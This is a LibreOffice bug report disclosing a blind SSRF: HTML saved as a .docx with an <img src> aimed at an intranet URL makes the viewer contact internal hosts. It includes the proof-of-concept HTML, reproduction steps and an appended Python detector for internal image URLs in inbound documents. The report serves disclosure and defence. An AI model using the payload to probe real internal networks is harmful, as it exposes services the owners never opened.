https://bugs.documentfoundation.org/show_bug.cgi?id=165601

            Bug ID: 165601
           Summary: LibreOffice has a blind SSRF (Server-Side Request
                    Forgery) vulnerability.
           Product: LibreOffice
           Version: unspecified
          Hardware: All
                OS: All
            Status: UNCONFIRMED
          Severity: normal
          Priority: medium
         Component: LibreOffice
          Assignee: [email protected]
          Reporter: [email protected]

Description:
When displaying a docx document containing HTML via LibreOffice, the software
attempts to parse the <img> tags in the HTML, which may lead to blind SSRF
vulnerabilities. Does the official team have plans to fix this? The payload is
like this. All versions are affected!

Replace the src value in the img with your intranet service URL, like oa or
something else.
*****************************payload******************************************

<!DOCTYPE html>
<html lang="en"
    xmlns:o="urn:schemas-microsoft-com:office:office"
    xmlns:w="urn:schemas-microsoft-com:office:word"
    xmlns="http://www.w3.org/TR/REC-html40">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <img src="your intranet service url">
</head>
<body>
</body>
</html>

Steps to Reproduce:
1. Create a new xxx.docx document.
2. Write HTML content into it:

<!DOCTYPE html>
<html lang="en"
    xmlns:o="urn:schemas-microsoft-com:office:office"
    xmlns:w="urn:schemas-microsoft-com:office:word"
    xmlns="http://www.w3.org/TR/REC-html40">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <img src="your intranet service url">
</head>
<body>
</body>
</html>

3. Open the docx with LibreOffice.

Actual Results:
LibreOffice will parse the HTML. Attackers can access the intranet URLs through
LibreOffice, although they have no way to obtain the returned content.


Expected Results:
HTML does not need to be parsed.



Reproducible: Always


User Profile Reset: No

Additional Info:
no
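As an added example that is not part of the bug report or of LibreOffice's own code, a defender-side check for the condition the report describes: it takes a file received as .docx, extracts every <img src> from the HTML it contains, and flags URLs whose host is loopback, RFC 1918, link-local or a dotless intranet name such as "oa". It assumes the HTML is either the whole file (HTML carrying a .docx extension, as in the steps above) or sits inside the XML/HTML parts of a real OOXML zip; the sample document is constructed here.

```python
import io
import ipaddress
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

class ImgSrcCollector(HTMLParser):
    """Collects every <img src> value, wherever the tag sits (the report puts it in <head>)."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.srcs += [v for k, v in attrs if k.lower() == "src" and v]

def html_parts(data):
    """Yield text to scan: the whole file when it is HTML with a .docx extension (the
    report's case), otherwise each XML/HTML part inside a real OOXML zip container."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if name.endswith((".xml", ".htm", ".html")):
                    yield zf.read(name).decode("utf-8", errors="replace")
    else:
        yield data.decode("utf-8", errors="replace")

def is_internal_host(host):
    """Loopback, RFC 1918, link-local and dotless intranet names (e.g. 'oa') are internal."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:  # not an IP literal (or None): fall back to name heuristics
        return bool(host) and (host.lower() == "localhost" or "." not in host)

def find_internal_img_urls(data):
    """Return <img src> URLs whose fetch would reach an internal host when rendered."""
    hits = []
    for text in html_parts(data):
        parser = ImgSrcCollector()
        parser.feed(text)
        hits += [s for s in parser.srcs
                 if urlparse(s).scheme in ("http", "https")
                 and is_internal_host(urlparse(s).hostname)]
    return hits

# Constructed sample in the report's shape (not taken from the bug): HTML saved as .docx.
SAMPLE_DOCX = (b'<!DOCTYPE html><html><head><title>Document</title>'
               b'<img src="http://10.0.0.5/oa/login"><img src="http://oa:8080/">'
               b'</head><body><img src="https://www.example.com/logo.png"></body></html>')
```

Run `find_internal_img_urls(open(path, "rb").read())` on inbound documents at a mail gateway or upload handler; a non-empty result marks a document that would make the viewer contact an internal host when opened.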
